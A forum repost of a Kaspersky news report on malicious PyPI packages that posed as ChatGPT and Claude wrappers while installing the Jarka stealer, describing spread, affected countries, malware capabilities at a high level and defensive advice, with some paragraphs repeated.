Man
Professional
- Messages
- 3,046
- Reaction score
- 571
- Points
- 113
Experts from Kaspersky GReAT (Kaspersky Lab's Global Research and Analysis Team) discovered an attack on the software supply chain that lasted for almost a year. Through the Python Package Index (PyPI) software repository, attackers distributed malicious packages under the guise of tools for creating chatbots based on neural networks. In this way, users' devices were infected with the Jarka stealer.
Kaspersky GReAT experts found that the malware developer was selling and distributing it via a Telegram channel and a bot using the Malware-as-a-Service (MaaS) model. They also found that the Jarka source code was uploaded to GitHub, making it available for download to anyone.
Based on the language artifacts found in the malware code and ads in Telegram, we can say with a medium to high degree of certainty that the malware was created by a Russian-speaking attacker.
“The discovered campaign highlights the ongoing risks associated with supply chain attacks. It is critical to exercise caution when integrating open source components during the development process. We recommend that organizations implement strict code integrity checks at all stages of development to ensure the legitimacy and security of external software or external components. This is especially important when integrating new popular technologies, such as neural networks,” comments Leonid Bezvershenko, cybersecurity expert at Kaspersky GReAT.
Kaspersky Lab reported the malicious packages to PyPI and has since removed them. The company continues to monitor activity related to Jarka and other suspicious uploads to open source platforms, including PyPI, to ensure the security of the software supply chain.
Source
Who was affected by the attack?
The malicious packages had been available on PyPI, a repository used by Python developers, since November 2023. Before they were discovered, they had been downloaded 1,700 times by users in 30 countries. According to PyPI statistics obtained from third-party monitoring services, the greatest interest in these tools was in the United States, China, France, Germany, and Russia. The attackers did not appear to be targeting any specific organization or region.How the threat was identified
Kaspersky GReAT experts discovered the malicious packages using an internal automated system for monitoring open-source repositories. These packages were disguised as Python wrappers for two popular neural network-based chatbots: ChatGPT by OpenAI and Claude AI by Anthropic. They did provide access to the chatbot functionality, but at the same time installed the Jarka stealer on users' devices.What can malware do?
The Jarka stealer, written in Java, allows you to steal data from various browsers, take screenshots, collect system information, and intercept session tokens from applications such as Telegram, Discord, Steam, and the Minecraft cheat client. The malware code also contains functionality for terminating processes in browsers such as Chrome and Edge, which allows you to access and steal saved data. Before it was deleted from the infected device, the collected information was sent to the attackers' server as an archive.Kaspersky GReAT experts found that the malware developer was selling and distributing it via a Telegram channel and a bot using the Malware-as-a-Service (MaaS) model. They also found that the Jarka source code was uploaded to GitHub, making it available for download to anyone.
Based on the language artifacts found in the malware code and ads in Telegram, we can say with a medium to high degree of certainty that the malware was created by a Russian-speaking attacker.
“The discovered campaign highlights the ongoing risks associated with supply chain attacks. It is critical to exercise caution when integrating open source components during the development process. We recommend that organizations implement strict code integrity checks at all stages of development to ensure the legitimacy and security of external software or external components. This is especially important when integrating new popular technologies, such as neural networks,” comments Leonid Bezvershenko, cybersecurity expert at Kaspersky GReAT.
Kaspersky Lab reported the malicious packages to PyPI and has since removed them. The company continues to monitor activity related to Jarka and other suspicious uploads to open source platforms, including PyPI, to ensure the security of the software supply chain.
Source
